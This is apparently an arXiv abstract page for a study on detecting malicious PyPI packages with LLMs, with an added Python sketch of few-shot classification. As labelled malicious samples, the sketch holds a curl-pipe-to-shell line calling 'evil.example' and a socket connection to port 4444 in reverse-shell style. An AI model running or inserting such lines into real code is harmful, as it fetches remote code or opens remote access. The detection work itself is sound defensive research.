Detecting Malicious Source Code in PyPI Packages with LLMs: Does RAG Come in Handy?
Malicious software packages in open-source ecosystems, such as PyPI, pose growing security risks. Unlike traditional vulnerabilities, these packages are intentionally designed to deceive users, and detecting them is challenging due to evolving attack methods and the lack of structured datasets. In this work, we empirically evaluate the effectiveness of Large Language Models (LLMs), Retrieval-Augmented Generation (RAG), and few-shot learning for detecting malicious source code. We fine-tune LLMs on curated datasets and integrate YARA rules, GitHub Security Advisories, and malicious code snippets with the aim of enhancing classification accuracy. We observe a counterintuitive outcome: although RAG is expected to boost prediction performance, it underperforms in our evaluation, achieving only mediocre accuracy. In contrast, few-shot learning proves more effective, substantially improving the detection of malicious code and reaching 97% accuracy and 95% balanced accuracy, thereby outperforming traditional RAG approaches. Thus, future work should expand structured knowledge bases, refine retrieval models, and explore hybrid AI-driven cybersecurity solutions.
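To make the few-shot setup concrete, the following is a minimal sketch of prompting an LLM to label a PyPI code snippet as malicious or benign, in the spirit of the approach the abstract describes. It is not the authors' exact pipeline: the model name, the exemplar snippets, and the prompt wording are illustrative assumptions.

```python
# Hedged sketch: few-shot LLM classification of a Python snippet as
# MALICIOUS or BENIGN. Model choice, exemplars, and prompt wording are
# assumptions, not the paper's exact configuration.
from openai import OpenAI

client = OpenAI()  # reads OPENAI_API_KEY from the environment

# Hypothetical few-shot exemplars: one malicious, one benign.
FEW_SHOT = [
    {"role": "user",
     "content": "import os\nos.system('curl http://evil.example/x.sh | sh')"},
    {"role": "assistant", "content": "MALICIOUS"},
    {"role": "user",
     "content": "def add(a, b):\n    return a + b"},
    {"role": "assistant", "content": "BENIGN"},
]

def classify(snippet: str) -> str:
    """Return the model's one-word MALICIOUS/BENIGN label for a snippet."""
    messages = (
        [{"role": "system",
          "content": "Classify the Python snippet as MALICIOUS or BENIGN. "
                     "Answer with exactly one word."}]
        + FEW_SHOT
        + [{"role": "user", "content": snippet}]
    )
    resp = client.chat.completions.create(model="gpt-4o-mini",
                                          messages=messages)
    return resp.choices[0].message.content.strip()

# Example: a reverse-shell-style snippet that the exemplars should steer
# the model toward labeling MALICIOUS.
print(classify("import socket\ns = socket.socket()\n"
               "s.connect(('203.0.113.7', 4444))"))
```

In the paper's evaluation, exemplars like these (rather than retrieved context from YARA rules or advisories) are what drove the reported 97% accuracy.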
Motunrayo Ibiyo, Thinakone Louangdy, Phuong T. Nguyen, Claudio Di Sipio, Davide Di Ruscio
Computing and Computer Technology; Security Science
Motunrayo Ibiyo, Thinakone Louangdy, Phuong T. Nguyen, Claudio Di Sipio, Davide Di Ruscio. Detecting Malicious Source Code in PyPI Packages with LLMs: Does RAG Come in Handy? [EB/OL]. (2025-04-18) [2025-04-26]. https://arxiv.org/abs/2504.13769.